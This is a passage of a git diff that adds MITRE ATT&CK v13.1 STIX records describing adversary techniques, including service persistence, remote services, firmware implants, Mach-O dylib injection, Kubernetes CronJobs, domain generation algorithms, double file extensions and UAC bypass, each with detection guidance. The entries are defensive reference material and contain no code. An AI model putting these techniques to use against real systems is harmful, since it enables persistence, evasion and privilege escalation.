On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) ", + "modified": "2022-04-20T16:52:58.415Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create or Modify System Process", + "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
\n\nMonitor for changes to files associated with system-level processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "File: File Modification", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Creation", + "Process: OS API Execution", + "Process: Process Creation", + "Driver: Driver Load", + "Command: Command Execution", + "File: File Creation", + "Service: Service Modification" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json new file mode 100644 index 0000000000000000000000000000000000000000..e0b9da18bd61f2ad1e8b1bc01105164335ca2302 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d.json 
@@ -0,0 +1,96 @@ +{ + "type": "bundle", + "id": "bundle--c7f9bd64-633a-4c05-ace9-dfc77c83c0ed", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:36.318Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. 
In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ExtraHop", + "David Fiser, @anu4is, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Idan Frimark, Cisco", + "Rory McCune, Aqua Security", + "Yuval Avrahami, Palo Alto Networks", + "Jay Chen, Palo Alto Networks", + "Brad Geesaman, @bradgeesaman", + "Magno Logan, @magnologan, Trend Micro", + "Ariel Shuper, Cisco", + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Daniel Oakley", + "Travis Smith, Tripwire", + "David Tayouri" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. 
Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Containers", + "macOS" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "created": "2017-05-31T21:31:44.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1133", + "external_id": "T1133" + }, + { + "source_name": "Volexity Virtual Private Keylogging", + "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", + "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). 
Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Trend Micro Exposed Docker Server", + "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json new file mode 100644 index 0000000000000000000000000000000000000000..d63cdce79a46b3da29b26e18ff18265406734b43 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--39a11eb0-0766-4c49-bc39-6ad5657e2057", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "type": "attack-pattern", + "created": "2017-05-31T21:31:22.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1109", + "url": "https://attack.mitre.org/techniques/T1109" + }, + { + "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.", + "source_name": "SanDisk SMART" + }, + { + "url": "https://www.smartmontools.org/", + "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", + "source_name": "SmartMontools" + }, + { + "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html", + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "source_name": "ITWorld Hard Disk Health Dec 2014" + } + ], + "modified": "2020-10-23T15:04:14.614Z", + "name": "Component Firmware", + "description": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. 
Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "File monitoring", + "Host intrusion prevention systems", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to update component device firmware from the host operating system." + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json new file mode 100644 index 0000000000000000000000000000000000000000..30a0e28ba02331a3bdfd64e1bcb3de7678ee7574 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--e4b3adb1-4d13-4e29-af2b-664525e903c5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "created": "2020-01-24T14:21:52.750Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1546.006", + "url": "https://attack.mitre.org/techniques/T1546/006" + }, + { + "source_name": "Malware Persistence on OS X", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017." + }, + { + "source_name": "Writing Bad Malware for OSX", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. 
Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn\u2019t checked at load time.(Citation: Malware Persistence on OS X)", + "modified": "2022-04-20T17:08:21.101Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "LC_LOAD_DYLIB Addition", + "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Metadata", + "Process: Process Creation", + "Module: Module Load", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json new file mode 100644 index 0000000000000000000000000000000000000000..cf8b04f447db9ec605cd3f3bef89254d394a017e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1126cab1-c700-412f-a510-61f4937bb096.json 
@@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--a84cf282-0f54-442e-80ec-49a4280a2b09", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T16:23:05.392Z", + "name": "Container Orchestration Job", + "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. 
", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Container: Container Creation", + "Scheduled Job: Scheduled Job Creation", + "File: File Creation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "created": "2021-03-29T17:06:22.247Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/007", + "external_id": "T1053.007" + }, + { + "source_name": "Kubernetes CronJob", + "description": "The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/" + }, + { + "source_name": "Kubernetes Jobs", + "description": "The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/job/" + }, + { + "source_name": "Threat Matrix for Kubernetes", + "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json new file mode 100644 index 0000000000000000000000000000000000000000..35d31998260acedca7438ef920d96031ed665fb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd.json 
@@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--8f2e5b86-04f0-45e2-b30c-2618f33ee73b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Benson, Exabeam", + "Barry Shteiman, Exabeam", + "Sylvain Gil, Exabeam" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "type": "attack-pattern", + "created": "2020-03-10T17:44:59.787Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1568.002", + "url": "https://attack.mitre.org/techniques/T1568/002" + }, + { + "source_name": "Cybereason Dissecting DGAs", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf", + "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019." + }, + { + "source_name": "Cisco Umbrella DGA", + "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/", + "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms \u2013 Why so effective?. Retrieved February 18, 2019." + }, + { + "source_name": "Unit 42 DGA Feb 2019", + "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/", + "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019." + }, + { + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. 
Retrieved March 9, 2018.", + "source_name": "Talos CCleanup 2017" + }, + { + "source_name": "Akamai DGA Mitigation", + "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html", + "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019." + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "source_name": "FireEye POSHSPY April 2017" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019." + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "Pace University Detecting DGA May 2017", + "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf", + "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019." + }, + { + "source_name": "Elastic Predicting DGA", + "url": "https://arxiv.org/pdf/1611.00791.pdf", + "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019." 
+ } + ], + "modified": "2022-03-11T18:26:23.432Z", + "name": "Domain Generation Algorithms", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. 
There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json new file mode 100644 index 0000000000000000000000000000000000000000..1c817e290978d204cce1825276de4cb3179d0443 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--1b226c49-87f8-4f40-bd07-b53776c18cbd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "type": "attack-pattern", + "created": "2021-08-04T20:54:03.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1036.007", + "url": "https://attack.mitre.org/techniques/T1036/007" + }, + { + "source_name": "PCMag DoubleExtension", + "url": "https://www.pcmag.com/encyclopedia/term/double-extension", + "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021." + }, + { + "source_name": "SOCPrime DoubleExtension", + "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/", + "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021." + }, + { + "source_name": "Seqrite DoubleExtension", + "url": "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/", + "description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021." + } + ], + "modified": "2021-10-14T21:09:59.588Z", + "name": "Double File Extension", + "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. 
The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Creation", + "File: File Metadata" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json new file mode 100644 index 0000000000000000000000000000000000000000..c0f673b9aa357a79b46ba82748d176c2b3832dbc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073.json 
@@ -0,0 +1,119 @@ +{ + "type": "bundle", + "id": "bundle--bfd5b208-bfd7-4a22-8705-a62aa912318f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T12:35:39.112Z", + "name": "Bypass User Account Control", + "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
